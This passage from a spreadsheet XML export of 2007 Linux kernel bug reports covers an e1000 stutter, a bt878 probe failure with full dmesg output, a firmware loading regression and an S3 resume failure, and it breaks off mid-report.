    <t>Most recent kernel where this bug did *NOT* occur: 2.6.17.14 Distribution: Gentoo Hardware Environment: Intel Q965 MB; on-board NIC (Intel(R) PRO/1000Intel - e1000 driver) Software Environment: Miminal - boot to console, stopped all services and still could reproduce Problem Description: System is exhibiting strange stutter. About every 2.5 seconds the system will freeze for about 0.1 - 0.2 seconds. Movies/games stutter. Console scrolling (no fb, no X) stutters. Firewire capture of DV contains errors with same period. Steps to reproduce: go to console and do "while true ; do date +%S.%N ; done". It should do a nice smooth scroll, but with e1000 driver compiled into kernel, it will stutter. On occasion, it did not start right away, but usually within 20 seconds, it would begin (might required nic activity?) Work around: compile e1000 as module. After system is up and ready, remove/reload driver (rmmod e1000 ; modprobe e1000) and it seems to go away.</t>
  </si>
  <si>
    <t>part of the device is not recognized on boot</t>
  </si>
  <si>
    <t>2.6.21-rc4</t>
  </si>
  <si>
    <t>2007-03-18 22:00 UTC</t>
  </si>
  <si>
    <t>aquamodem</t>
  </si>
  <si>
    <t>2008-09-26 05:53 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: not sure Distribution:debian Hardware Environment:Intel P3 with Pinnacle PCTV card lspci 00:00.0 Host bridge: VIA Technologies, Inc. VT82C693A/694x [Apollo PRO133x] (rev 44) 00:01.0 PCI bridge: VIA Technologies, Inc. VT82C598/694x [Apollo MVP3/Pro133x AGP] 00:07.0 ISA bridge: VIA Technologies, Inc. VT82C596 ISA [Mobile South] (rev 23) 00:07.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 10) 00:07.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 11) 00:07.3 Host bridge: VIA Technologies, Inc. VT82C596 Power Management (rev 30) 00:09.0 Ethernet controller: Intel Corporation 82557/8/9 [Ethernet Pro 100] (rev 02) 00:0a.0 Multimedia video controller: Brooktree Corporation Bt878 Video Capture (rev 11) 00:0a.1 Multimedia controller: Brooktree Corporation Bt878 Audio Capture (rev 11) 00:0b.0 Multimedia audio controller: Creative Labs SB Live! EMU10k1 (rev 0a) 00:0b.1 Input device controller: Creative Labs SB Live! Game Port (rev 0a) 01:00.0 VGA compatible controller: nVidia Corporation NV11 [GeForce2 MX/MX 400] (rev a1) lsusb Bus 001 Device 002: ID 045e:008c Microsoft Corp. Wireless Intellimouse Explorer 2.0 Bus 001 Device 001: ID 0000:0000 cat cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 8 model name : Pentium III (Coppermine) stepping : 10 cpu MHz : 997.497 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 mmx fxsr sse up bogomips : 1996.74 clflush size : 32 cat interrupts CPU0 0: 13271759 XT-PIC-XT timer 1: 19047 XT-PIC-XT i8042 2: 0 XT-PIC-XT cascade 5: 2841465 XT-PIC-XT bttv0 6: 5 XT-PIC-XT floppy 7: 1 XT-PIC-XT parport0 8: 1 XT-PIC-XT rtc 9: 1 XT-PIC-XT acpi 10: 464512 XT-PIC-XT uhci_hcd:usb1, EMU10K1 12: 147592 XT-PIC-XT eth0 14: 228336 XT-PIC-XT ide0 15: 858297 XT-PIC-XT ide1 NMI: 0 LOC: 0 ERR: 0 MIS: 0 Software Environment:debian boot lsmod Module Size Used by binfmt_misc 11080 1 ppdev 8740 0 lp 11044 0 button 8080 0 ac 5348 0 battery 10116 0 smbfs 58552 5 ipv6 233792 16 nls_cp850 5088 2 vfat 12128 2 fat 48316 1 vfat nls_iso8859_1 4256 3 ntfs 200960 1 dm_snapshot 16516 0 dm_mirror 20020 0 dm_mod 52524 2 dm_snapshot,dm_mirror eeprom 7184 0 sr_mod 16132 0 sbp2 21188 0 ieee1394 89112 1 sbp2 psmouse 35080 0 ide_generic 1408 0 [permanent] snd_emu10k1_synth 7072 0 snd_emux_synth 31040 1 snd_emu10k1_synth snd_seq_virmidi 6912 1 snd_emux_synth snd_seq_midi_emul 6016 1 snd_emux_synth snd_emu10k1 122688 3 snd_emu10k1_synth snd_ac97_codec 91072 1 snd_emu10k1 ac97_bus 2432 1 snd_ac97_codec snd_util_mem 4672 2 snd_emux_synth,snd_emu10k1 snd_hwdep 8740 2 snd_emux_synth,snd_emu10k1 snd_pcm_oss 39072 1 snd_pcm 71556 3 snd_emu10k1,snd_ac97_codec,snd_pcm_oss snd_page_alloc 9704 2 snd_emu10k1,snd_pcm snd_mixer_oss 15488 1 snd_pcm_oss snd_seq_dummy 3876 0 snd_seq_oss 29376 0 bt878 10712 0 snd_seq_midi 8320 0 snd_rawmidi 22368 3 snd_seq_virmidi,snd_emu10k1,snd_seq_midi tuner 56680 0 bttv 169748 1 bt878 video_buf 23236 1 bttv firmware_class 9504 2 snd_emu10k1,bttv snd_seq_midi_event 7008 3 snd_seq_virmidi,snd_seq_oss,snd_seq_midi ir_common 34212 1 bttv emu10k1_gp 3872 0 gameport 14920 2 emu10k1_gp rtc 12408 0 compat_ioctl32 1472 1 bttv i2c_algo_bit 7400 1 bttv parport_pc 32868 1 parport 33576 3 ppdev,lp,parport_pc 8250_pnp 9632 0 floppy 54116 0 i2c_viapro 8500 0 btcx_risc 4872 1 bttv tveeprom 14320 1 bttv snd_seq 46192 9 snd_emux_synth,snd_seq_virmidi,snd_seq_midi_emul,snd_seq_dummy,snd_seq_oss,snd_seq_midi,snd_seq_midi_event snd_timer 20708 3 snd_emu10k1,snd_pcm,snd_seq snd_seq_device 7788 8 snd_emu10k1_synth,snd_emux_synth,snd_emu10k1,snd_seq_dummy,snd_seq_oss,snd_seq_midi,snd_rawmidi,snd_seq snd 48164 15 snd_emux_synth,snd_seq_virmidi,snd_emu10k1,snd_ac97_codec,snd_hwdep,snd_pcm_oss,snd_pcm,snd_mixer_oss,snd_seq_oss,snd_rawmidi,snd_seq,snd_timer,snd_seq_device soundcore 7584 2 snd i2c_core 20736 6 eeprom,tuner,bttv,i2c_algo_bit,i2c_viapro,tveeprom pcspkr 3136 0 videodev 26176 1 bttv v4l2_common 15968 3 tuner,bttv,videodev v4l1_compat 12516 2 bttv,videodev shpchp 31156 0 via_agp 10144 1 pci_hotplug 29312 1 shpchp agpgart 32296 1 via_agp mousedev 10980 1 tsdev 7680 0 evdev 9376 4 ext3 121064 5 jbd 53096 1 ext3 mbcache 8388 1 ext3 usbhid 23424 0 ide_cd 36608 0 cdrom 32896 2 sr_mod,ide_cd ide_disk 15552 11 pata_via 11396 0 ata_generic 8260 0 e100 32360 0 mii 5376 1 e100 uhci_hcd 22572 0 usbcore 122696 3 usbhid,uhci_hcd via82cxxx 8708 0 [permanent] generic 4932 0 [permanent] ide_core 104168 5 ide_generic,ide_cd,ide_disk,via82cxxx,generic thermal 14184 0 processor 30664 1 thermal fan 4964 0 Problem Description: bt878: probe of 0000:00:0a.1 failed with error -22 bttv: driver version 0.9.17 loaded bttv: using 8 buffers with 2080k (520 pages) each for capture bttv: Bt8xx card found (0). ACPI: PCI Interrupt Link [LNKC] enabled at IRQ 5 PCI: setting IRQ 5 as level-triggered ACPI: PCI Interrupt 0000:00:0a.0[A] -&gt; Link [LNKC] -&gt; GSI 5 (level, low) -&gt; IRQ 5 bttv0: Bt878 (rev 17) at 0000:00:0a.0, irq: 5, latency: 64, mmio: 0xe7101000 bttv0: detected: Pinnacle PCTV [card=39], PCI subsystem ID is 11bd:0012 bttv0: using: Pinnacle PCTV Studio/Rave [card=39,autodetected] bttv0: gpio: en=00000000, out=00000000 in=00ff0fff [init] bttv0: i2c: checking for MSP34xx @ 0x80... not found bttv0: miro: id=3 tuner=2 radio=no stereo=no bttv0: using tuner=2 bttv0: i2c: checking for MSP34xx @ 0x80... not found bttv0: i2c: checking for TDA9875 @ 0xb0... not found bttv0: i2c: checking for TDA7432 @ 0x8a... not found bttv0: i2c: checking for TDA9887 @ 0x86... not found tuner 1-0060: All bytes are equal. It is not a TEA5767 tuner 1-0060: chip found @ 0xc0 (bt878 #0 [sw]) tuner 1-0060: type set to 2 (Philips NTSC (FI1236,FM1236 and compatibles)) tuner 1-0060: type set to 2 (Philips NTSC (FI1236,FM1236 and compatibles)) bttv0: registered device video0 bttv0: registered device vbi0 bttv0: PLL: 28636363 =&gt; 35468950 .. ok bt878: AUDIO driver version 0.0.0 loaded bt878: Bt878 AUDIO function found (0). ACPI: PCI Interrupt 0000:00:0a.1[A] -&gt; Link [LNKC] -&gt; GSI 5 (level, low) -&gt; IRQ 5 bt878_probe: card id=[0x1211bd], Unknown card. Exiting.. ACPI: PCI interrupt for device 0000:00:0a.1 disabled bt878: probe of 0000:00:0a.1 failed with error -22 ACPI: PCI Interrupt 0000:00:0b.0[A] -&gt; Link [LNKD] -&gt; GSI 10 (level, low) -&gt; IRQ 10 Adding 2096472k swap on /dev/hdb2. Priority:-1 extents:1 across:2096472k EXT3 FS on hdb1, internal journal Steps to reproduce:boot full dmesg follows: cat dmesg Linux version 2.6.21-rc4 (watermod@dali) (gcc version 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)) #1 SMP Sat Mar 17 02:07:59 CDT 2007 BIOS-provided physical RAM map: sanitize start sanitize end copy_e820_map() start: 0000000000000000 size: 00000000000a0000 end: 00000000000a0000 type: 1 copy_e820_map() type is E820_RAM copy_e820_map() start: 00000000000f0000 size: 0000000000010000 end: 0000000000100000 type: 2 copy_e820_map() start: 0000000000100000 size: 0000000037ef0000 end: 0000000037ff0000 type: 1 copy_e820_map() type is E820_RAM copy_e820_map() start: 0000000037ff0000 size: 0000000000003000 end: 0000000037ff3000 type: 4 copy_e820_map() start: 0000000037ff3000 size: 000000000000d000 end: 0000000038000000 type: 3 copy_e820_map() start: 00000000ffff0000 size: 0000000000010000 end: 0000000100000000 type: 2 BIOS-e820: 0000000000000000 - 00000000000a0000 (usable) BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 0000000037ff0000 (usable) BIOS-e820: 0000000037ff0000 - 0000000037ff3000 (ACPI NVS) BIOS-e820: 0000000037ff3000 - 0000000038000000 (ACPI data) BIOS-e820: 00000000ffff0000 - 0000000100000000 (reserved) 0MB HIGHMEM available. 895MB LOWMEM available. Entering add_active_range(0, 0, 229360) 0 entries of 256 used Zone PFN ranges: DMA 0 -&gt; 4096 Normal 4096 -&gt; 229360 HighMem 229360 -&gt; 229360 early_node_map[1] active PFN ranges 0: 0 -&gt; 229360 On node 0 totalpages: 229360 DMA zone: 32 pages used for memmap DMA zone: 0 pages reserved DMA zone: 4064 pages, LIFO batch:0 Normal zone: 1759 pages used for memmap Normal zone: 223505 pages, LIFO batch:31 HighMem zone: 0 pages used for memmap DMI 2.2 present. ACPI: RSDP 000F6B60, 0014 (r0 GBT ) ACPI: RSDT 37FF3000, 0028 (r1 GBT AWRDACPI 42302E31 AWRD 0) ACPI: FACP 37FF3040, 0074 (r1 GBT AWRDACPI 42302E31 AWRD 0) ACPI: DSDT 37FF30C0, 21D0 (r1 GBT AWRDACPI 1000 MSFT 100000C) ACPI: FACS 37FF0000, 0040 ACPI: PM-Timer IO Port: 0x4008 Allocating PCI resources starting at 40000000 (gap: 38000000:c7ff0000) Built 1 zonelists. Total pages: 227569 Kernel command line: root=/dev/hdb1 ro Local APIC disabled by BIOS -- you can enable it with "lapic" mapped APIC to ffffd000 (0170c000) Enabling fast FPU save and restore... done. Enabling unmasked SIMD FPU exception support... done. Initializing CPU#0 PID hash table entries: 4096 (order: 12, 16384 bytes) Detected 997.497 MHz processor. Console: colour VGA+ 80x25 Dentry cache hash table entries: 131072 (order: 7, 524288 bytes) Inode-cache hash table entries: 65536 (order: 6, 262144 bytes) Memory: 901544k/917440k available (1725k kernel code, 15224k reserved, 666k data, 208k init, 0k highmem) virtual kernel memory layout: fixmap : 0xfff4f000 - 0xfffff000 ( 704 kB) pkmap : 0xff800000 - 0xffc00000 (4096 kB) vmalloc : 0xf8800000 - 0xff7fe000 ( 111 MB) lowmem : 0xc0000000 - 0xf7ff0000 ( 895 MB) .init : 0xc035e000 - 0xc0392000 ( 208 kB) .data : 0xc02af5d1 - 0xc0356014 ( 666 kB) .text : 0xc0100000 - 0xc02af5d1 (1725 kB) Checking if this processor honours the WP bit even in supervisor mode... Ok. Calibrating delay using timer specific routine.. 1996.74 BogoMIPS (lpj=3993497) Security Framework v1.0.0 initialized SELinux: Disabled at boot. Capability LSM initialized Mount-cache hash table entries: 512 CPU: After generic identify, caps: 0387f9ff 00000000 00000000 00000000 00000000 00000000 00000000 CPU: L1 I cache: 16K, L1 D cache: 16K CPU: L2 cache: 256K CPU serial number disabled. CPU: After all inits, caps: 0383f9ff 00000000 00000000 00000040 00000000 00000000 00000000 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#0. Checking 'hlt' instruction... OK. SMP alternatives: switching to UP code Freeing SMP alternatives: 12k freed ACPI: Core revision 20070126 ACPI: setting ELCR to 0200 (from 1e20) CPU0: Intel Pentium III (Coppermine) stepping 0a SMP motherboard not detected. Local APIC not detected. Using dummy APIC emulation. Brought up 1 CPUs NET: Registered protocol family 16 ACPI: bus type pci registered PCI: PCI BIOS revision 2.10 entry at 0xfb380, last bus=1 PCI: Using configuration type 1 Setting up standard PCI resources ACPI: Interpreter enabled ACPI: (supports S0 S1 S4 S5) ACPI: Using PIC for interrupt routing ACPI: PCI Root Bridge [PCI0] (0000:00) PCI: Probing PCI hardware (bus 00) 0000:00:07.1: cannot adjust BAR0 (not I/O) 0000:00:07.1: cannot adjust BAR1 (not I/O) 0000:00:07.1: cannot adjust BAR2 (not I/O) 0000:00:07.1: cannot adjust BAR3 (not I/O) PCI: Firmware left 0000:00:09.0 e100 interrupts enabled, disabling Boot video device is 0000:01:00.0 ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Interrupt Link [LNKA] (IRQs 1 3 4 5 6 7 10 *11 12 14 15) ACPI: PCI Interrupt Link [LNKB] (IRQs 1 3 4 5 6 7 10 11 *12 14 15) ACPI: PCI Interrupt Link [LNKC] (IRQs 1 3 4 *5 6 7 10 11 12 14 15) ACPI: PCI Interrupt Link [LNKD] (IRQs 1 3 4 5 6 7 *10 11 12 14 15) Linux Plug and Play Support v0.97 (c) Adam Belay pnp: PnP ACPI init pnp: PnP ACPI: found 12 devices PnPBIOS: Disabled by ACPI PNP SCSI subsystem initialized libata version 2.20 loaded. PCI: Using ACPI for IRQ routing PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report NET: Registered protocol family 8 NET: Registered protocol family 20 pnp: 00:00: iomem range 0xcc000-0xcdfff has been reserved pnp: 00:00: iomem range 0xf0000-0xf7fff could not be reserved pnp: 00:00: iomem range 0xf8000-0xfbfff could not be reserved pnp: 00:00: iomem range 0xfc000-0xfffff could not be reserved Time: tsc clocksource has been installed. PCI: Bridge: 0000:00:01.0 IO window: disabled. MEM window: e4000000-e5ffffff PREFETCH window: d8000000-dfffffff PCI: Setting latency timer of device 0000:00:01.0 to 64 NET: Registered protocol family 2 IP route cache hash table entries: 32768 (order: 5, 131072 bytes) TCP established hash table entries: 131072 (order: 8, 1572864 bytes) TCP bind hash table entries: 65536 (order: 7, 524288 bytes) TCP: Hash tables configured (established 131072 bind 65536) TCP reno registered checking if image is initramfs... it is Switched to high resolution mode on CPU 0 Freeing initrd memory: 4300k freed audit: initializing netlink socket (disabled) audit(1174214039.144:1): initialized VFS: Disk quotas dquot_6.5.1 Dquot-cache hash table entries: 1024 (order 0, 4096 bytes) io scheduler noop registered io scheduler anticipatory registered (default) io scheduler deadline registered io scheduler cfq registered Activating ISA DMA hang workarounds. isapnp: Scanning for PnP cards... isapnp: No Plug &amp; Play device found Serial: 8250/16550 driver $Revision: 1.90 $ 4 ports, IRQ sharing enabled serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A serial8250: ttyS1 at I/O 0x2f8 (irq = 3) is a 16550A RAMDISK driver initialized: 16 RAM disks of 8192K size 1024 blocksize PNP: PS/2 Controller [PNP0303:PS2K] at 0x60,0x64 irq 1 PNP: PS/2 controller doesn't have AUX irq; using default 12 serio: i8042 KBD port at 0x60,0x64 irq 1 TCP bic registered NET: Registered protocol family 1 NET: Registered protocol family 17 Using IPI No-Shortcut mode Freeing unused kernel memory: 208k freed input: AT Translated Set 2 keyboard as /class/input/input0 ACPI: CPU0 (power states: C1[C1] C2[C2]) ACPI: Processor [CPU0] (supports 2 throttling states) Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx VP_IDE: IDE controller at PCI slot 0000:00:07.1 VP_IDE: chipset revision 16 VP_IDE: not 100% native mode: will probe irqs later VP_IDE: VIA vt82c596b (rev 23) IDE UDMA66 controller on pci0000:00:07.1 ide0: BM-DMA at 0xd000-0xd007, BIOS settings: hda:DMA, hdb:DMA ide1: BM-DMA at 0xd008-0xd00f, BIOS settings: hdc:DMA, hdd:DMA Probing IDE interface ide0... usbcore: registered new interface driver usbfs usbcore: registered new interface driver hub usbcore: registered new device driver usb USB Universal Host Controller Interface driver v3.0 e100: Intel(R) PRO/100 Network Driver, 3.5.17-k2-NAPI e100: Copyright(c) 1999-2006 Intel Corporation hda: WDC WD600BB-32BSA0, ATA DISK drive Time: acpi_pm clocksource has been installed. hdb: WDC WD800BB-75CAA0, ATA DISK drive ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 Probing IDE interface ide1... hdc: SAMSUNG CD-R/RW SW-216B Q001 20010913, ATAPI CD/DVD-ROM drive hdd: DVD-ROM DDU1621, ATAPI CD/DVD-ROM drive ide1 at 0x170-0x177,0x376 on irq 15 ACPI: PCI Interrupt Link [LNKD] enabled at IRQ 10 PCI: setting IRQ 10 as level-triggered ACPI: PCI Interrupt 0000:00:07.2[D] -&gt; Link [LNKD] -&gt; GSI 10 (level, low) -&gt; IRQ 10 uhci_hcd 0000:00:07.2: UHCI Host Controller uhci_hcd 0000:00:07.2: new USB bus registered, assigned bus number 1 uhci_hcd 0000:00:07.2: irq 10, io base 0x0000d400 usb usb1: configuration #1 chosen from 1 choice hub 1-0:1.0: USB hub found hub 1-0:1.0: 2 ports detected ACPI: PCI Interrupt Link [LNKB] enabled at IRQ 12 PCI: setting IRQ 12 as level-triggered ACPI: PCI Interrupt 0000:00:09.0[A] -&gt; Link [LNKB] -&gt; GSI 12 (level, low) -&gt; IRQ 12 e100: eth0: e100_probe: addr 0xe7100000, irq 12, MAC addr 00:A0:C9:5A:ED:1E hda: max request size: 128KiB hda: 117231408 sectors (60022 MB) w/2048KiB Cache, CHS=65535/16/63, UDMA(33) hda: cache flushes not supported hda: hda1 hda2 hda3 hdb: max request size: 128KiB hdb: Host Protected Area detected. current capacity is 156250000 sectors (80000 MB) native capacity is 156301488 sectors (80026 MB) hdb: Host Protected Area disabled. hdb: 156301488 sectors (80026 MB) w/2048KiB Cache, CHS=65535/16/63, UDMA(33) hdb: cache flushes not supported hdb: hdb1 hdb2 hdb3 hdb4 &lt; hdb5 hdb6 hdb7 &gt; usb 1-1: new low speed USB device using uhci_hcd and address 2 hdc: ATAPI 32X CD-ROM CD-R/RW drive, 2048kB Cache, DMA Uniform CD-ROM driver Revision: 3.20 hdd: ATAPI 40X DVD-ROM drive, 512kB Cache, UDMA(33) usb 1-1: configuration #1 chosen from 1 choice usbcore: registered new interface driver hiddev input: Microsoft Microsoft Wireless Optical Desktop&amp;#65533; 1.00 as /class/input/input1 input: USB HID v1.11 Mouse [Microsoft Microsoft Wireless Optical Desktop&amp;#65533; 1.00] on usb-0000:00:07.2-1 usbcore: registered new interface driver usbhid drivers/usb/input/hid-core.c: v2.6:USB HID core driver kjournald starting. Commit interval 5 seconds EXT3-fs: mounted filesystem with ordered data mode. mice: PS/2 mouse device common for all mice Linux agpgart interface v0.102 (c) Dave Jones pci_hotplug: PCI Hot Plug PCI Core version: 0.5 agpgart: Detected VIA Apollo Pro 133 chipset agpgart: AGP aperture is 64M @ 0xe0000000 shpchp: Standard Hot Plug PCI Controller Driver version: 0.4 Linux video capture interface: v2.00 input: PC Speaker as /class/input/input2 Floppy drive(s): fd0 is 1.44M 00:08: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A 00:09: ttyS1 at I/O 0x2f8 (irq = 3) is a 16550A FDC 0 is a post-1991 82077 parport: PnPBIOS parport detected. parport0: PC-style at 0x378 (0x778), irq 7, dma 3 [PCSPP,TRISTATE,COMPAT,EPP,ECP,DMA] Real Time Clock Driver v1.12ac gameport: EMU10K1 is pci0000:00:0b.1/gameport0, io 0xe000, speed 1242kHz bttv: driver version 0.9.17 loaded bttv: using 8 buffers with 2080k (520 pages) each for capture bttv: Bt8xx card found (0). ACPI: PCI Interrupt Link [LNKC] enabled at IRQ 5 PCI: setting IRQ 5 as level-triggered ACPI: PCI Interrupt 0000:00:0a.0[A] -&gt; Link [LNKC] -&gt; GSI 5 (level, low) -&gt; IRQ 5 bttv0: Bt878 (rev 17) at 0000:00:0a.0, irq: 5, latency: 64, mmio: 0xe7101000 bttv0: detected: Pinnacle PCTV [card=39], PCI subsystem ID is 11bd:0012 bttv0: using: Pinnacle PCTV Studio/Rave [card=39,autodetected] bttv0: gpio: en=00000000, out=00000000 in=00ff0fff [init] bttv0: i2c: checking for MSP34xx @ 0x80... not found bttv0: miro: id=3 tuner=2 radio=no stereo=no bttv0: using tuner=2 bttv0: i2c: checking for MSP34xx @ 0x80... not found bttv0: i2c: checking for TDA9875 @ 0xb0... not found bttv0: i2c: checking for TDA7432 @ 0x8a... not found bttv0: i2c: checking for TDA9887 @ 0x86... not found tuner 1-0060: All bytes are equal. It is not a TEA5767 tuner 1-0060: chip found @ 0xc0 (bt878 #0 [sw]) tuner 1-0060: type set to 2 (Philips NTSC (FI1236,FM1236 and compatibles)) tuner 1-0060: type set to 2 (Philips NTSC (FI1236,FM1236 and compatibles)) bttv0: registered device video0 bttv0: registered device vbi0 bttv0: PLL: 28636363 =&gt; 35468950 .. ok bt878: AUDIO driver version 0.0.0 loaded bt878: Bt878 AUDIO function found (0). ACPI: PCI Interrupt 0000:00:0a.1[A] -&gt; Link [LNKC] -&gt; GSI 5 (level, low) -&gt; IRQ 5 bt878_probe: card id=[0x1211bd], Unknown card. Exiting.. ACPI: PCI interrupt for device 0000:00:0a.1 disabled bt878: probe of 0000:00:0a.1 failed with error -22 ACPI: PCI Interrupt 0000:00:0b.0[A] -&gt; Link [LNKD] -&gt; GSI 10 (level, low) -&gt; IRQ 10 Adding 2096472k swap on /dev/hdb2. Priority:-1 extents:1 across:2096472k EXT3 FS on hdb1, internal journal ieee1394: Initialized config rom entry `ip1394' device-mapper: ioctl: 4.11.0-ioctl (2006-10-12) initialised: dm-devel@redhat.com kjournald starting. Commit interval 5 seconds EXT3 FS on hdb3, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS on hdb7, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS on hdb5, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS on hdb6, internal journal EXT3-fs: mounted filesystem with ordered data mode. NTFS driver 2.1.28 [Flags: R/W MODULE]. NTFS volume version 3.1. NET: Registered protocol family 10 lo: Disabled Privacy Extensions ADDRCONF(NETDEV_UP): eth0: link is not ready e100: eth0: e100_watchdog: link up, 100Mbps, full-duplex ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready</t>
  </si>
  <si>
    <t>Firmware loading is broken</t>
  </si>
  <si>
    <t>2.6.21-rc4-mm1</t>
  </si>
  <si>
    <t>2007-03-20 13:25 UTC</t>
  </si>
  <si>
    <t>2007-03-27 11:19 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.21-rc3-mm2 Distribution: Fedora devel Hardware Environment: AMD X2 + CK804 + E-MU 1820m + PVR150 Software Environment: N/A Problem Description: snd_emu10k &amp; ivtv are not finding their firmware files anymore Mar 20 20:28:35 rousalka kernel: ivtv: ==================== START INIT IVTV ==================== Mar 20 20:28:35 rousalka kernel: ivtv: version 1.0.0 (2.6.21-0.23.rc4.mm1.fc7 SMP mod_unload ) loading Mar 20 20:28:35 rousalka kernel: sr0: scsi3-mmc drive: 40x/40x writer cd/rw xa/form2 cdda tray Mar 20 20:28:35 rousalka kernel: Uniform CD-ROM driver Revision: 3.20 Mar 20 20:28:35 rousalka kernel: eth0: forcedeth.c: subsystem: 01458:e000 bound to 0000:00:0a.0 Mar 20 20:28:35 rousalka kernel: ACPI: PCI Interrupt 0000:01:08.2[B] -&gt; Link [APC2] -&gt; GSI 17 (level, low) -&gt; IRQ 17 Mar 20 20:28:35 rousalka kernel: fw_ohci: Added fw-ohci device 0000:01:08.2, OHCI version 1.10 Mar 20 20:28:35 rousalka kernel: ACPI: PCI Interrupt Link [APC3] enabled at IRQ 18 Mar 20 20:28:35 rousalka kernel: ACPI: PCI Interrupt 0000:01:0a.0[A] -&gt; Link [APC3] -&gt; GSI 18 (level, low) -&gt; IRQ 18 Mar 20 20:28:35 rousalka kernel: fw_ohci: Added fw-ohci device 0000:01:0a.0, OHCI version 1.10 Mar 20 20:28:35 rousalka kernel: ivtv0: Autodetected Hauppauge card (cx23416 based) Mar 20 20:28:35 rousalka kernel: ACPI: PCI Interrupt Link [APC4] enabled at IRQ 19 Mar 20 20:28:35 rousalka kernel: ACPI: PCI Interrupt 0000:01:07.0[A] -&gt; Link [APC4] -&gt; GSI 19 (level, low) -&gt; IRQ 19 Mar 20 20:28:35 rousalka kernel: fw_core: created new fw device fw0 (0 config rom retries) Mar 20 20:28:35 rousalka kernel: fw_core: created new fw device fw1 (0 config rom retries) Mar 20 20:28:35 rousalka kernel: firmware_loading_store: unexpected value (0) Mar 20 20:28:35 rousalka kernel: ivtv0: unable to open firmware v4l-cx2341x-enc.fw (must be 376836 bytes) Mar 20 20:28:35 rousalka kernel: ivtv0: did you put the firmware in the hotplug firmware directory? Mar 20 20:28:35 rousalka kernel: ivtv0: Retry loading firmware Mar 20 20:28:35 rousalka kernel: firmware_loading_store: unexpected value (0) Mar 20 20:28:35 rousalka kernel: ivtv0: unable to open firmware v4l-cx2341x-enc.fw (must be 376836 bytes) Mar 20 20:28:35 rousalka kernel: ivtv0: did you put the firmware in the hotplug firmware directory? Mar 20 20:28:35 rousalka kernel: ivtv0: Error initializing firmware Mar 20 20:28:35 rousalka kernel: ivtv0: Error -19 on initialization Mar 20 20:28:35 rousalka kernel: ivtv: ==================== END INIT IVTV ==================== Mar 20 20:28:35 rousalka kernel: ACPI: PCI Interrupt 0000:02:00.0[A] -&gt; Link [APC2] -&gt; GSI 17 (level, low) -&gt; IRQ 17 Mar 20 20:28:35 rousalka kernel: sky2 0000:02:00.0: v1.13 addr 0xe5000000 irq 17 Yukon-EC (0xb6) rev 1 Mar 20 20:28:35 rousalka kernel: sky2 eth1: addr 00:14:85:0c:3e:a4 Mar 20 20:28:35 rousalka kernel: ACPI: PCI Interrupt Link [APC1] enabled at IRQ 16 Mar 20 20:28:35 rousalka kernel: ACPI: PCI Interrupt 0000:01:08.0[A] -&gt; Link [APC1] -&gt; GSI 16 (level, low) -&gt; IRQ 16 Mar 20 20:28:35 rousalka kernel: emu1010: Special config. Mar 20 20:28:35 rousalka kernel: emu1010: EMU_HANA_ID=0x1 Mar 20 20:28:35 rousalka kernel: firmware_loading_store: unexpected value (0) Mar 20 20:28:35 rousalka kernel: firmware: emu/hana.fw not found. Err=-2 Steps to reproduce: boot</t>
  </si>
  <si>
    <t>AOpen cdrom 56X/AKH qc timeout under libata</t>
  </si>
  <si>
    <t>2007-03-21 01:50 UTC</t>
  </si>
  <si>
    <t>Yarema</t>
  </si>
  <si>
    <t>2007-04-09 12:23 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Hardware Environment: Software Environment: Problem Description: Steps to reproduce:</t>
  </si>
  <si>
    <t>S3: resume fails - 2.6.21 regression</t>
  </si>
  <si>
    <t>2007-03-21 06:18 UTC</t>
  </si>
  <si>
    <t>Tobias Doerffel</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.20.3 Distribution: Debian Hardware Environment: Acer Aspire 5652 (Core Duo, 1 GB RAM, Intel 82801G/ICH7-chipset) Software Environment: Desktop Problem Description: Suspend to RAM used to work fine on my computer up to 2.6.20.3. But no matter which rc of 2.6.21 I use, suspend to RAM doesn't work anymore. Up to rc3 even suspending stopped at "suspending console" which appearently seems to be fixed in rc4. I tried rc4-git4 with minimal config (no dyndicks, no HRT, no MSI, no sound, no bluetooth, no PCMCIA, no WLAN, no USB, no cpufreq) but still I can't resume properly. Caps works and I can login through SSH. Back to a more complete config (sound, MMC, WLAN, PCMCIA - still no dynticks or HRT - see attachment "config") I get exactly the same behaviour. When logged in through SSH after resume I saved output of dmesg (which includes full power management debug messages), see attachement "dmesg-resume". The system basically seems to be back but lot of things do not work such as loading/unloading e.g. my WLAN-driver (ipw3945), running "top" or "dstat" etc. "uptime" always returns 0 min, even with power management debug disabled. Kernel: Linux version 2.6.21-rc4 (gcc version 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)) #23 SMP PREEMPT Mon Mar 19 12:27:56 CET 2007 A complete bisect between 2.6.20 and 2.6.21-rc4-git4 stops at a stage (a4bbb810dedaecf74d54b16b6dd3c33e95e1024c) where I'm not able to compile the kernel anymore because of compiling-errors in arch/i386/kernel/setup.c (ACPI-related compiling errors). Stepping some revisions back until it compiled again resume didn't work either. So I started all 